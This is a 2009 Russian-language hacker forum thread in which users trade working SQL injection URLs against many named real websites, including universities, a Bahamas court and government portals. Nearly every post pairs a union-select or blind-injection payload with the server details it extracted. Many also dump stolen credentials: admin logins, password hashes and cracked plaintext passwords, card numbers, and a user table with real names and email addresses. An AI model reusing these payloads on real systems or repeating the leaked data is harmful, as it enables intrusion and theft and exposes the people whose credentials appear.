http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ @@version--&Sort=1
Microsoft SQL Server 2000 - 8.00.534 (Intel X86) Nov 19 2001 13:23:50 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ db_name()--&Sort=1
BillSystem
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ system_user--&Sort=1
CC_Client
все таблы
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TA BLE_NAME+NOT+IN+('BS_ACCOUNTS','BS_ADV_REPORT_TASK ','BS_ADV_REPORT_TASK_SCHEDULE','BS_ANI_INFO','BS_ AUDIT','BS_CDRLOG','BS_CURRENCIES','BS_CURRENCY_RA TES','BS_DIAL_AREAS','BS_DIAL_CODE_INTERZONE','BS_ DIAL_CODES','BS_DIAL_CODES_save','BS_DIAL_PREFIXES ','BS_DIAL_ZONES','BS_DNIS','BS_DNIS_USER_GROUP_MA P','BS_GRANTS','BS_GROUPS','BS_HOLIDAYS','BS_PHONE _BOOK','BS_PHONE_GROUP_MAP','BS_PHONE_GROUPS','BS_ PHONES','BS_SERVICE_UNITS','BS_SERVICES','BS_TARIF F_CONDITIONS','BS_TARIFF_PLAN_MAP','BS_TARIFF_PLAN S','BS_TARIFFS','BS_TASK_QUEUE','BS_TRANSACTIONS', 'BS_USER_GROUP_MAP','BS_USER_GROUPS','BS_USER_PHON E_GROUP_MAP','BS_USERS','BS_W_METRO','BS_W_METRO_L INE','BS_W_METRO_POINT','BS_W_POINT_GROUP','BS_W_S ALE_POINT','BS_WEEKEND_EXCEPTIONS','BS_ZONE_MAP',' dtproperties','sysconstraints','syssegments','view _cdr_by_distance_key','VIEW1','VIEW2')--&Sort=1
и например номер карты и пасс
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ cast(F_NAME+as+nvarchar)%2B%27%3A%27%2Bcast(F_PAN+ as+nvarchar)%2B%27%3A%27%2Bcast(F_PASSWORD+as+nvar char)+FROM+BS_USERS--&Sort=1
№ 8536****:85366849:849652
Iceangel_
30.04.2009, 10:04
edu, PR=7
http://www.rit.edu/news/?c=student'+and+1=2+union+select+1,2,3,4,5,version (),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
Database Version: 5.0.77
Database name: w_news
User name: w-news@web01www01c.rit.edu
HAXTA4OK
30.04.2009, 14:27
Сайт студенческого научного общества Белорусского государственного медицинского университета
http://snobsmu.com/news.php?id=1&tab=vnbol§or_id=-9+union+select+concat_ws(0x3a,version(),user(), database())--
5.0.67-community:snobsmu_boss@localhost:snobsmu_main
<<SITC.ru: Новости высоких технологий>>
http://www.sitc.ru/index.php?id=99999999999999'+union+select+1,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),3,4,5,6,7,8,9,0,1,2,3--+
4.0.26-log:sitc:sitc@localhost:portbld-freebsd5.2.1
Target: www.fashionguide.dk
Evil link: http://www.fashionguide.dk/international/news/news.php?id=871+union+select+concat_ws(0x203a20,ve rsion(),database(),user(),@@version_compile_os)--+
Info:
version: 5.0.67
database: look4fashion_dk_db
user: look4fashion@localhost
OS: redhat-linux-gnu
Admin:
bdm:ef19cf2f9c2faeb520542022e35f1cfe (pass: hestesko)
erihtoney
30.04.2009, 15:50
Грузинская Экономическая Академия(Тбилиси)
http://www.ael.ge/geo/viewsyllabus.php?id=-1+union+select+1,2,3,concat_ws(0x203a20,user(),
version(),database()),5,6
user: ael_edu_ge@localhost
version: 4.0.27
database: ael_edu_ge
_____________________________
Грузинский форум программистов
http://portal.soft.ge/main.php?section_id=3&
script_id=2&
file_id=-1+union+select+1,,3,4,5,6,7,8,9,10,11,12,13,14,15, 16/*
_____________________________
http://www.mersinozelidare.gov.tr/sayfa_icerik.php?yol=0_3+union+select+1,2,3,4
,5,6,7,8,9,10/*
_____________________________
http://www.podvesnoi.ru/catalog.php?group=-2+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--
version: 4.1.22-log
database: wwwpodvesnoiru_podvesnoi
user: podvesno@localhos
____________
http://www.7sun.ru/index.php?action=catalog&act=view&id=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8--
version: 5.0.51
database: s7sun
user: s7sun@localhost
____________
http://www.tehnikavdom.ru/ishop.php?s=catalog&id=-46+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--
version: 5.0.75-log
database: vdomdk1u_tehnika
user: vdomdk1u_vdom@c9-w.ht-systems.ru
M.W.N.N.
30.04.2009, 16:33
http://www.natural-immunogenics.com/news_detail.php?NewsID=7+union+select+1,2,version( ),4,5,6,7,8+limit+1,1/*
version():4.1.22
database():naturalimm
user():niuser@localhost
erihtoney
30.04.2009, 16:37
http://www.disy.org/activecoach/produkte/produkt.php?ID=100+union+select+1,2,
3,4,5,6,7,8
,concat_ws(0x3a20203a,version(),user(),
database())--
version:4.0.18-nt
user:AK51@WEBSERVER1
database:ak51
_________________________________
http://www.hollybaby.org/news.php?id=-1+union+select+1,concat_ws(0x203a20,
user(),version(),database()),3,4,5,6,7,8,9--
version:4.0.15-nt
user:tronslien@64-141-114-108.static.dns77.com
database:tronslien
http://www.anunturiutilajeconstructii.ro/detal.php?id=-737+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,concat_ws(0x3a,version(),database(),us er()),20,21,22,23,24,25,26--
5.0.77-community:utilcon_anunturi:utilcon_alin881@localho st
http://www.esunaganga.com/articulos.promocionales/show.detal.php?id=-355+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12--
4.1.22-standard:ganga_ganga2:ganga_gangaus@localhost
http://www.marcopolo.dk/php/rejser/detal.php?id=580+and+substring(@@version,1,1)=5
http://mapy.com.pl/index.php?right=detal.php&id=974+and+substring(@@version,1,1)=5
HAXTA4OK
30.04.2009, 20:16
что то про армейцев ЦСКА
http://www.peski.ru/index.php?action=stadium&id=-1+union+select+1,2,concat_ws(0x3a,version(),user() , database()),4,5,6,7,8,9,10,11--
4.0.27-log:peski@zvm3.host.ru:peski
ТИЦ: 180
PR: 5
http://www.kordek.ru/news.php?id=-1'+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4/*
5.0.33:us5136j@localhost:db5136j
www.kordek.ru
ТИЦ: 130
PR: 4
http://www.eurobabyshop.ru/divisions.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6--
5.0.67-log:u31546@10.10.153.191:u31546
есть табла phpbb Но форум не нашел =\
http://www.eurobabyshop.ru/divisions.php?id=-1+union+select+1,2,3,table_name, 5,6+from+information_schema.tables--
ТИЦ: 130
PR: 4
.:[melkiy]:.
30.04.2009, 21:10
http://www.cyprusvines.com/more_info.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 5.0.67
Database name: cyprusvines_com
User name: root@localhost
Есть доступ к mysql.user Интересная таблица: cv_user
Login: root
Pass: 1a329e5f66335263
Login: admin
Pass: 266075ec3b7a2a5b
Админка:
http://www.cyprusvines.com/admin
БД:
http://www.cyprusvines.com/phpmyadmin
http://www.jewishpro.com/eventdetail.php?id=-35+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22--
Database Version: 4.1.20
Database name: jewishpro_com_-_db
User name: jpndb@localhost
HAXTA4OK
30.04.2009, 22:50
езотерики млин))))
http://ezoterik.org/v_posveshmagia.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database())/*
5.0.32-Debian_7etch6-log:z95723_ezot@77.221.130.26:z95723_ezot
ТИЦ: 70
PR: 4
------------------------------------------------------------------------
http://www.24sauna.ru/index.php?a=humor&page=-9&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database())--
5.0.67-log:24sauna_dbu1@localhost:24sauna_db1
ТИЦ: 10
PR: 0
------------------------------------------------------------------------
ПРОГРЕСС-СТРОЙ
Строительство деревянных домов
http://prog-str.ru/index.php?action=goods&razdel=1&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--
5.0.51a-log:dusuy_prog@217.112.35.44:dusuy_prog
------------------------------------------------------------------------
http://www.bvnn.ru/indexf.php?act=art&id=-1+union+select+concat_ws(0x3a,version(),user(), database()),2--
4.1.22-standard:bvnnru_main@localhost:bvnnru_main
ТИЦ: 20
PR: 2
------------------------------------------------------------------------
Мир саун )))
http://www.mir-saun.ru/view_news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() , database()),4,5,6,7--
4.0.27-max-log:mirsaun6@v41.valuehost.ru:mirsaun6
ТИЦ: 20
PR: 1
------------------------------------------------------------------------
http://www.studio-proekt.ru/quote.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(), user(), database())--
4.1.22-log:studiop6_dro@localhost:studiop6_studio
------------------------------------------------------------------------
http://www.black-rocks.ru/service.php?ID=-1+union+select+1,concat_ws(0x3a,version(), user(),database()),3,4,5,6,7,8--
5.0.67-community-log:blackroc_black@localhost:blackroc_blackrocks
ТИЦ: 10
PR: 1
------------------------------------------------------------------------
http://nstec.ru/index.php?act=products&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--
4.1.22:art@localhost:nst
ТИЦ: 10
PR: 2
------------------------------------------------------------------------
HAXTA4OK
30.04.2009, 23:52
http://lepel.by/articles_view.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11, 12--
5.0.32-Debian_7etch5-log:lepelby@localhost:lepelby
ТИЦ: 20
PR: 2
есть форум, колонки и таблу угадал)))))
http://lepel.by/articles_view.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,u ser_password),7,8,9,10,11,12+from+phpbb_users+limi t+ 1,1--
admin:80fea3c366ba45d21300be6518ca95f0
+++AndreyDevil+++
01.05.2009, 00:46
http://www.art.illinois.edu/news_detail.php?newsid=-65+union+select+1,2,3,4,5,6,7/*
---------------------------------
5.0.45
---------------------------------
art_illinois_edu@localhost
---------------------------------
art_uiuc_edu
---------------------------------
http://www.art.illinois.edu/admin/
admin : M3an#m
HAXTA4OK
01.05.2009, 00:59
http://www.laborcatalog.ru/articles/viewarticle.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9--
4.1.22-log:laborcat@localhost:wwwlaborcatalogr
molotovkeyt
01.05.2009, 05:42
PR - 3
http://www.marketflash.in/post/view_article.php?id=-1921+union+select+1,2,3,4,5,version(),7,8,9,0,1,2, 3,4--
4 ветка.
Брутить не стал.
PR - 5
http://www.headsup.ie/view_article.php?id=-2+union+select+1,version(),3,4,5,6--
5 ветка.
Таблица headsup_admin
Колонки admin_name:admin_real:admin_pass
decob : Declan Boylan:e93316c5e301f303d588f542ec478228
пасс - satan!c
davepyro:davepyro:b1c84f8d672b5d6a84a7a486e81b465a
пасс - hendrix
headsupadmin:Admin:5602e2b81315938814373d474c09932 a
Админка - http://www.headsup.ie/admin/index.php
mailbrush
01.05.2009, 09:38
http://moto-bike.ru/ss.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6/*mataru_moto@localhost:mataru_moto:5.0.26-log
Target: www.cfnielsen.dk
Evil link: http://www.cfnielsen.dk/news.php?id=-31'+union+select+1,2,3,4,5,6,concat_ws(0x203a20,us er(),database(),version(),@@version_compile_os)/*
Info:
user: cfn2008@mx2.euroteam.com
database: cfnielsen2008
versuin: 5.0.45
OS: redhat-linux-gnu - 2
M.W.N.N.
01.05.2009, 10:36
http://www.nolia.se/eurominexpo/index.php?id=9+union+select+1,2,3,4,concat_ws(0x3a ,version(),database(),user()),6,7,8+limit+1,1/*
version()4.0.27-standard
database():nolia_0
user():nolia@62.119.28.108
__
http://www.jba-design.se/products.php?id=27+union+select+1,2,concat_ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10,11,12 ,13,14,15/*
version()5.0.45-log
database():jba_design_se
user():_design_se@j9687@s79.loopia.se
__
http://www.tepg.se/showtitle.php?id=230+union+select+1,2,concat_ws(0x 3a,version(),database(),user()),4,5,6+limit+1,1
version()5.0.51a-24-log
database():wonderwork_db1
user():wonderwork_db1@192.168.0.52
http://www.tepg.se/showtitle.php?id=230+union+select+1,2,concat_ws(0x 3a,id,username,password),4,5,6+from+admin+limit+1, 1
1:hdnine:cb7ea8e5ad69ce0be6c3f1f0032dad4a
__
http://web.sbf.se/regler/visaregler.php?id=1+union+select+1,2,3,4,unhex(hex (concat(0x3a,version(),database(),user()))),6,7,8, 9,10,11,12,13,14/*
version()4.1.11
database():sbf
user():sbfweb@localhost
__
http://www.swedetab.se/visaTab.php?id=1799+union+select+1,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7,8,9+limit+1 ,1/*
version()5.0.33-log
database():swedetab
user():swedetab@localhost
__
http://www.gggames.se/review.php?id=118+union+select+1,concat_ws(0x3a,ve rsion(),database(),user()),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
version()5.0.32-Debian_7etch10-log
database():gggames_se
user():gggames_se@srv113.one.com
__
http://www.apavi.lv/e-shop/lat/index.php?page=brand&id=63+union+select+concat_ws(0x3a,version(),databa se(),user())
version()4.1.22-standard-log
database():apavdb
user():apavadm@localhost
http://www.apavi.lv/e-shop/lat/index.php?page=brand&id=63+union+select+concat_ws(0x3a,id,user,pass,ema il)+from+users
35:y00:y00:
__
http://fast-anime.ru/shop/index.php?p=detail.php&g=18&Id=102%27+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+limit+1,1/*
version()5.0.32-Debian_7etch8-log
database():fast2007_shop
user():fast2007_shop@77.221.130.24
HAXTA4OK
01.05.2009, 10:50
http://olvexdiagnost.spb.ru/catalog/items_description.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),user(), database()),10,11,12,13,14,15,16,17--
5.0.24a-community-max-nt-log:1gb_olvexd@10.0.1.13:1gb_olvexd
ТИЦ: 100
PR: 4
http://www.traunstein.com/landratsamt/show.php?ID=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8--
5.0.51b-log:db198610:db198610@local3
http://keels-n-wheels.com/show.php?id=140246+union+select+1,2,3,4,5,6,7,8,9, 10,concat_ws(0x3a,version(),database(),user()),12, 13,14,15,16,17,18,19,20,21,22,23,24,25--
4.0.14-Max:knw:root@localhost
http://www.cs3r.org/show.php?id=10+and+substring(@@version,1,1)=4
_SEREGA_
01.05.2009, 11:17
http://www.evergladesfoundation.org/article.php?id=-10+union+select+1,concat_ws(0x3a,version(),%20user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
5.0.67
HAXTA4OK
01.05.2009, 11:30
http://www.limceb.ie/events_detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9--
5.0.45-log:limceb_user@web11.hosting365.ie:limceb_databas e
ТИЦ: 0
PR: 5
------------------------------------------------------------------------
http://www.carrigdhoun.ie/index.php?p=story&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6--
5.0.45:carrigdhoun@localhost:carrigdhoun
------------------------------------------------------------------------
http://www.wineweb.ie/winemakers_view.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--
5.0.45-log:wineweb_user@web14.hosting365.ie:wineweb_winew eb
erihtoney
01.05.2009, 11:59
Один из самых посещаемых новостных порталов Грузии,посвященных ИТ
http://inews.internet.ge/stat_relatives.html?date=2008-08-09&stat=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),
database()),6,7,8,9,10,11,12,13/*
version:5.0.32-Debian_7
user:etch1webuser@localhost
database:oldnews
http://inews.internet.ge/stat_relatives.html?date=2008-08-09&stat=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13+from+information_s
chema.tables+limit+58,1/*
tables: 58
HAXTA4OK
01.05.2009, 12:17
http://www.gspltd.ge/index.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(), database()),9,10,11,12,13,14,15--&lang=rus
4.0.27:gspltd_ge@localhost:gspltd_ge
ТИЦ: 0
PR: 4
DezMond™
01.05.2009, 12:48
http://www.opendoors-de.org/details.php?id=122&idelement=-7702+union+select+1,2,3,4,5,6--&supp_page=news_archives
table:
users1
modelusers
modelcaddieusers
catalog_cartusers
cataloguepode_caddieusers
HAXTA4OK
01.05.2009, 13:05
http://www.wap-prague.org/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (), user())--
4.0.27-log:mysql19076:mysql11499@81.0.225.83
ТИЦ: 0
PR: 4
Target: www.bahamassupremecourt.gov.bs
Evil link: http://www.bahamassupremecourt.gov.bs/rules.php?id=-160+union+select+1,2,3,4,5,6,concat_ws(0x2f,user() ,database(),version(),@@version_compile_os),8,9,10 ,11,12,13,14,15,16,17,18/*
Database info:
user: scourt@localhost
database: regatta_supremecourt
version: 5.0.45
Users (login:рassword:mail):
webmaster:d7JhdmSDXI9Os:dwayne.roper@digitalisle.c om
egevans:17Tj/yEs0udP6:estelle.evans@courts.gov.bs
dornell.brown:dbzLqzSCXxmuY:brown.dornell@hotmail. com
keva.smith:doDI9RjsNFbQE:keva.smith@courts.gov.bs
www.tkdpress.com
http://www.tkdpress.com/shop.php?training'&ID=7+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6
Версия - 5.0.51a
Юзер - U3966181@77.232.72.45
БД -U3966181
Таблички с юзерами:
http://www.tkdpress.com/shop.php?training'&ID=7+union+select+1,2,concat_ws(0x3a,username_clea n,password,email),4,5,6+from+users+limit+0,1
http://www.tkdpress.com/shop.php?training'&ID=7+union+select+1,2,concat_ws(0x3a,username,user _password),4,5,6+from+phpbb_users+limit+1,1
www.adrmotorsport.com
http://www.adrmotorsport.com/shop.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5
Версия - 4.1.20
Юзер - adr_root@localhost
БД - adr_news
www.lostrivercraft.com
http://www.lostrivercraft.com/shop.php?id=7+union+select+1,2,concat_ws(0x3a,vers ion(),user(),database()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22/*
Версия - 5.0.22
Юзер - lostriver@localhost
БД - lostriver
http://www.emarketinganswers.com/qna/show.php?id=-428+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3--
5.0.22:ema_data:mork@localhost
http://www.telecomresearch.ru/show.php?id=-1275+union+select+1,unhex(hex(concat_ws(0x3a,versi on(),database(),user()))),3,4,5,6,7,8,9,10,11,12,1 3,14--
4.1.16-standard:telecomres_1:telecomres@lbarbero-2.m-10.ru
http://www.infogeo.ru/metalls/board/show.php?id=382884+and+substring(@@version,1,1)=5
http://www.wrm.ru/news/show.php?id=63+and+substring(@@version,1,1)=5
HAXTA4OK
01.05.2009, 15:31
http://www.maloneoregan.ie/page.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11, 12,13--
4.1.20:maloneoregan_ie_-_mor:maloneoregan@localhost
ТИЦ: 0
PR: 3
mailbrush
01.05.2009, 16:11
http://www.millerab.com/projects-under-construction.php?ID=1+or+1=system_user
User: millerabreader
http://www.millerab.com/projects-under-construction.php?ID=1+or+1=db_name()
DB: millerab
http://www.millerab.com/projects-under-construction.php?ID=1+or+1=@@version
Version: Microsoft SQL Server 2005 - 9.00.3077.00 (X64) Dec 17 2008 20:40:08 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
MsSQL Injection
DezMond™
01.05.2009, 16:12
http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,group_concat(f_name,char(58), password,char(58),email,char(58),level),4,5,6,7,8, 9,10+from+users+--+
Claudiney:e1df95cfb2a487e111103a69c090ba3f:claudin ey.calixto1@terra.com.br:3
Wagner:c4c8f45b4d559e57c25e4d78e66a4d1c:wcastellan i@unialco.com.br:3
José Roberto de:25d55ad283aa400af464c76d713c07ad:renata@telinve ste.com.br:1
Victor Hugo:86cc29875c59f760998e13403c5fcbfc:betapec@bol. com.br:1
Jessica Saletti:a45643ba9765a92f68a3d1ec460379a9:jessica.g ago@yahoo.com.br:1
Pedro Henrique:cc2d7966d741ee6fa430b0d791a228fc:pfregado lli@yahoo.com.br:1
Marcos:da4144fa7412769cf953f25d1a3bd120:marcosanto niolanza@hotmail.com:1
Fábio:239aeb645b2ba44b6ad8abd77575cf23:garcia-alv@unialco.com.br:1
Jair Ramos dos Santos:88cd9cc9b0af2c54f945ca0ff6c6212a:jairramos@ ibest.com.br:1
Michele:381c65a9689bd3f852e61a020ac051af:michele_s hibata@yahoo.com.br:1
Fernando:25d78cf8ea297b70ba268ad7211637bd:nandosou sa2002@yahoo.com.br:1
Marineusa:50e887ab23e106ab1414bb3d33132505:oliveir a_marineusa@ig.com.br:1
Carlos César da Silva Cabral:00c555d31e1ffcbcaaadbb822b1f0a9c:carlosscab ral@uol.com.br:1
Jefferson Eduardo boaventura:102b4fe641956db45a46824a19
HAXTA4OK
01.05.2009, 16:15
http://www.alanmoore.ie/productDetails.php?id=1+union+select+1,concat_ws(0 x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
5.0.45-community-log:AlanMoo_alanmoore:AlanMoo_alanmoor@web9.hostin g365.ie
ТИЦ: 0
PR: 4
mailbrush
01.05.2009, 16:28
http://www.designassociates.ie/keystaff.php?id=1+and+1=0+union+select+1,concat_ws (0x3a,user(),database(),version()),3,4+--+
general@localhost:Designassociates:5.0.24
http://www.designassociates.ie/keystaff.php?id=1+and+1=0+union+select+1,concat_ws (0x3a,user,password),3,4+from+mysql.user+--+
root:*1753F71060D207B40F2F70F752289368D0026D7B
HAXTA4OK
01.05.2009, 16:35
http://www.imro.ie/calendar/calendar.php?op=cat&id=-1'+union+select+1,2,concat_ws(0x3a,version(),datab ase(), user()),4,5,6/*
4.1.22:calendar:root@localhost
ТИЦ: 10
PR: 6
------------------------------------------------------------------------
http://www.solicitor.ie/article.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (), user())--
5.0.45-log:finkeegan:mrfin@cgi0401.int.bizland.net
ТИЦ: 0
PR: 3
------------------------------------------------------------------------
http://www.hanleyauctioneers.ie/content.php?id=-1+union+select+1,2,concat_ws(0x3a, version(),database(),user()),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40--
5.0.45:ghanleyproperty:claremorrisger@65.98.64.211
ТИЦ: 0
PR: 2
------------------------------------------------------------------------
http://www.cellenergy.ie/information_center_indetail.php?id=-1+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6--
5.0.67-community:celle3_cms:celle3_cms@localhost
ТИЦ: 0
PR: 3
.:[melkiy]:.
01.05.2009, 17:02
Pадио АПЛЮС - первая интернет станция в Республике Беларусь
http://music.aichyna.com/providers/?id=-1+union+select+1,2,3--
Database Version: 5.0.32-Debian_7etch8
Database name: aichyna_shoutcast
User name: shoutcast@localhost
Интересные таблици: radio_login, bf_members_converge, ibf_members
тИЦ 600
HAXTA4OK
01.05.2009, 17:17
http://www.idc.ul.ie/people.php?id=-1+union+select+1,2,concat_ws(0x3a,version(), database(),user()),4,5,6,7,8,9,10,11,12--
4.1.20:idcweb:apache@localhost.2@ul.ie
ТИЦ: 0
PR: 5
------------------------------------------------------------------------
http://www.crisispregnancy.ie/pressrelease.php?id=-1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),u ser()),5,6--
5.0.27-community-nt:cpadb:cpauser@dinadan.blacknight.ie
PR: 6
spherics
01.05.2009, 17:28
Мужики серьёзные привилегии sysadmin.
http://collusion.org/Article.cfm?ID=176%20or%201=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://collusion.org/Article.cfm?ID=176%20or%201=(select%20system_user)--
NT AUTHORITY\SYSTEM
http://collusion.org/Article.cfm?ID=176%20or%201=(select%20db_name())--
CollusionZine
HAXTA4OK
01.05.2009, 17:34
http://www.corporatereputations.ie/case_study.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(), user()),4,5,6,7,8,9,10--
5.0.45-community-log:nboyle_crdata:nboyle_crdbUse1@web1.hosting365. ie
PR: 2
------------------------------------------------------------------------
чей то там офиц сайт))
http://www.veliko-tarnovo.net/index.php?page=notice&type=t&id=-1'+union+select+1,concat_ws(0x3a,version(),databas e() ,u ser()),3,4,5/*
4.1.20:veliko-tarnovo_net_-_main3:vtarnovo@localhost
ТИЦ: 10
PR: 5
erihtoney
01.05.2009, 18:27
Официальный сайт полиции Индонезии
PR:3
All tables:
http://www.simalungunkab.go.id/en/?id=-1+union+select+1,2,3,4,
group_concat(table_name),6+from+information_schema .tables--
version:5.0.67-community
user:simalung_root@localhost
database:simalung_simalungun
DezMond™
01.05.2009, 18:53
http://www.advancedstaffing.jobs/details.php?id=31+union+select+1,version(),databas e(),4,5,6,7,8,9/*
4.0.27-max-log
advstaff
www.monne.ru
http://www.monne.ru/?show=catalog&id=-34+union+select+1,2,3,4--
version()4.1.22-standard-log
database()monneru_main
user()monneru_adm@localhost
compile_os()pc-linux-gnu
www.armouredvehicles.net
http://www.armouredvehicles.net/vehicle.php?id=-107+union+select+1,2,3,4,concat_ws(0x203a20,versio n(%20),database(),user(),@@version_compile_os),6,7 ,8--
version()5.0.67-log
database()zbozi_mortarinvestments_eu
user()zbozi.mortarinvestments.eu@193.86.238.53
compile_os()unknown-linux-gnu
HAXTA4OK
01.05.2009, 19:04
http://www.bourgas-real-estate.com/show_news.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6--
5.0.67-log:bourgas_real:bourgas_real@localhost
есть таблица: rea_users =
http://www.bourgas-real-estate.com/show_news.php?id=-1+u nion+select+1,table_name,3,4,5,6+from+information_ schem a.tables+limit+46,1--
PR: 3
------------------------------------------------------------------------
http://www.gdi.gov.ge/index.php?lang=eng&id=1+union+select+1,concat_ws(0x3a,versi on(),databa se(),use r()),3,4,5,6--
5.0.77:gdigov_garemo:gdigov@localhost
PR: 2
таблицы:
contact
description
images
news
users
Blind SQL-inj
Target: www.strut.bm
Evil links:
http://www.strut.bm/products.php?page=1&categoryID=16+and+ascii(lower(substring(version(), 1,1)))=52 result: false
http://www.strut.bm/products.php?page=1&categoryID=16+and+ascii(lower(substring(version(), 1,1)))=53 result: true
и т.д.
Info:
version: 5.1.30
user: strutbm@localhost
database: strutbm_shoestore
HAXTA4OK
01.05.2009, 20:13
http://www.gepra.ge/eng/showserv.php?id=1'+union+select+1,2,concat_ws(0x3a ,version(),databa se(),us er()),4,5,6/*
4.1.13:gepra_ge:gepra.ge@localhost
ТИЦ: 10
PR: 4
------------------------------------------------------------------------
http://www.backofthehouse.eu/news.php?lg=ge&id=1+union+select+1,2,3,concat_ws(0x3a,version(),d atab ase(),u ser()),5,6,7,8,9,10,11,12,13--
5.0.45-log:backofthehousech:both@localhost
_SEREGA_
01.05.2009, 21:13
скуль:
5.0.67
http://www.helilooja.ee/emp_eng.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11--
инфа:
http://www.helilooja.ee/emp_eng.php?id=-25+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), 0x3a,database()),8,9,10,11--
HAXTA4OK
01.05.2009, 21:17
http://www.whpr.ie/menu.php?id=1&sid=-5+union+select+1,2,3,concat_ws(0x3 a,version( ),data base(),user()),5,6,7,8,9,10,11,12,13--
4.0.15:whpr:whpr@localhost
PR: 4
_SEREGA_
01.05.2009, 22:59
скуль:
http://www.tsl.net.ru/index.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11--
4.0.26
инфа:
http://www.tsl.net.ru/index.php?id=-25+union+select+1,2,concat_ws(0x3a,user()),4,5,6,7 ,8,9,10,11--
tslnetru@localhost
<<Туры.ру>>
http://www.tury.ru/image.php?rgallery_id=9999999999/**/union/**/select/**/1,2,concat_ws(0x3a,version(),database(),user(),@ve rsion_compile_os),4,5,6,7,8,9,0,1--
5.0.70:TURY_data@10.0.50.9
DezMond™
02.05.2009, 01:17
http://bangla8.com/corporate/corp-jobs-details.php?id=-192+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13,14,15--
5.0.67-community
.:[melkiy]:.
02.05.2009, 01:44
http://www.mesagerul.ro/index.php?id=id:-00000043398+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15--
5.0.32-Debian_7etch8-log:mesagerul_ro:mesagerulălocalhost
erihtoney
02.05.2009, 08:15
_____________________
LSCA
PR:5
http://www.noxubee.lib.ms.us/bookclub/forum/forums.asp?iFor=12+union+select+1,
2,3,u_password,5,u_id
,7,8,9,10,11,12+from+users
_____________________
http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8--
version: 5.0.67-percona-highperf-b7-log
database: tulluk
user: tulluk@localhost
